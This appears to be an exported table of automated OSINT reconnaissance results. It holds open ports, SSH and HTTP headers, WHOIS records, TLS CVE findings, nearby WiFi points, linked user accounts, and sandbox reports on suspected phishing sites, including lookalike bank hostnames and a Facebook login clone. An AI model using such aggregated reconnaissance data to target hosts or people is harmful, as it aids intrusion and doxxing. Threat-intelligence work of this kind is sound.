| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | eAdisyon@ozgen (Net ID: 00:02:6F:C9:2B:E8) | 40.2024, 29.0398 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.62): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:21 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | 185.199.108.153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 5 | 0 | 2 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU | https://ayhu.xyz/ |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Apple Network 031c82 (Net ID: 00:02:2D:03:1C:82) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | sofurry (Category: art)
https://login.sofurry.com | login |
| 2023-05-12 02:55:15 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 165.232.113.85:80 | 165.232.113.85 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2083 | 188.114.96.1 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@namecheap.com | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:44:12 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Sectigo | kekw.battleb0t.xyz |
| 2023-05-12 02:58:47 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | ayhu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Viking (Net ID: 00:01:71:0B:CD:2E) | 52.3759, 4.8975 |
| 2023-05-12 03:20:27 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pillowfort (Category: social)
https://www.pillowfort.social/patrick.pogoda | patrick.pogoda |
| 2023-05-12 03:15:39 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 0 | 3 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 165.232.113.85 |
| 2023-05-12 03:33:56 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | mntrRGB XYZ
desc
trXYZ
<mluc
-mluc
3`-O!
6fD`
N@e@8
s$01@H
@jlveI
B4Pic
.E"E3@YB
8RktA
-B09:
FRp.PD
A7e k
`kfZb
A8tSNJ
4j@Q4
H8@I"
`Y@A4
!Ot-T
Hh4@OFx4
@2RIA
.MoFZ
S>J9`
1tjP@
A!<Il
3rInvMB
6flJ$
bPD1T_aAc
_`0Zp
1 QVQ
`MXp<K
M39CvX
JtP5A
wtIXB
-3nB-
rtiC
1@f!X
I.ABD
'`jh
tj!HC
Fyv3/
-ApI
99pfaHF
/jMql
5Oy@8U2Q9
Mpi.`
y5_@.
sTiQJ
4Qfqml
wc7nAS
3fti0
w2MrS
?O`OU
E7-B/
PQj@fQod
'ASM6
'aC_@
>JkA8
ks< j
nP?2P
5z'0i
ALQxL
`-DJE
-HqnK
LSq a
S`j68
sV\0i7
IIA4K/
a/L K
R3E5H
$ii/aD<V
@9qEkj
fdcK-
k\p/
e<@E7
TPkZAY
o@i>K
IT 'v
Ip@>u
9x:'F
A/e7h
vj/a1
BnMLh
rJMD\
$5eiS r
@k<rPfcnM
nTqD
8JMKu
-h eo
6OCil-
NdZs>J
H yZ4
eKvkJ
MDA8n
A8mJ'
jTO!D
wPKqV | https://funny.battleb0t.xyz/images/fredo.PNG |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00.github.io]
https://www.openphish.com/feed.txt | 00.github.io |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 13335 | 188.114.96.0/24 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | YouTube User2 (Category: video)
https://www.youtube.com/@Altpapier | Altpapier |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Pragma": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Pragma": ["no-cache"], "Set_Cookie": ["whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "whostmgrsession=%3a8HJb2gy62wgW5AEl%2cc019e95b194ab8d9598010e513f0ec9b; HttpOnly; path=/; port=2087; secure", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2087; secure", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 02:47:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://sahnawaz786.github.io/Facebook_login_clone_project', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'http://sahnawaz786.github.io/facebook_login_clone_project', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://sahnawaz786.github.io/facebook_login_clone_project', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://sahnawaz786.github.io/Facebook_login_clone_project', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sahnawaz786.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /Facebook_login_clone_project HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: sahnawaz786.github.io" (Indicator: "mozilla/5.0 (")\n "GET /Facebook_login_clone_project HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: sahnawaz786.github.io" (Indicator: "user-agent: ")\n "GET /Facebook_login_clone_project/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: sahnawaz786.github.io" (Indicator: "mozilla/5.0 (")\n "GET /Facebook_login_clone_project/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: sahnawaz786.github.io" (Indicator: "user-agent: ")\n "GET /Facebook_login_clone_project/Images/fblogo.png HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: sahnawaz786.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /Facebook_login_clone_project/Images/fblogo.png HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: sahnawaz786.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /Facebook_login_clone_project/Images/facebook.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://sahnawaz786.github.io/Facebook_login_clone_project/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sahnawaz786.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /Facebook_login_clone_project/Images/facebook.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://sahnawaz786.github.io/Facebook_login_clone_project/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sahnawaz786.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "facebook_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_d74_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_d74_ConnHashTable<3444>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d74_IESQMMUTEX_0_331"\n "IsoScope_d74_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3444"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d74_IE_EarlyTabStart_0x97c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d74_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sahnawaz786.github.io"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "PHD1U0AR.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PHD1U0AR.txt]- [targetUID: 00000000-00003444]\n Dropped file: "3SZP8PGX.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3SZP8PGX.txt]- [targetUID: 00000000-00003444]\n Dropped file: "ZF56VNU9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZF56VNU9.txt]- [targetUID: 00000000-00002884]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "facebook_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "~DFA37422F32059F537.TMP" has type "data"- Location: [%TEMP%\\~DFA37422F32059F537.TMP]- [targetUID: 00000000-00003444]\n "~DF94049321D0CFF6EA.TMP" has type "data"- Location: [%TEMP%\\~DF94049321D0CFF6EA.TMP]- [targetUID: 00000000-00003444]\n "~DF7AA4F6B0C2777651.TMP" has type "data"- Location: [%TEMP%\\~DF7AA4F6B0C2777651.TMP]- [targetUID: 00000000-00003444]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "Facebook_login_clone_project_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "Facebook_login_clone_project_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n 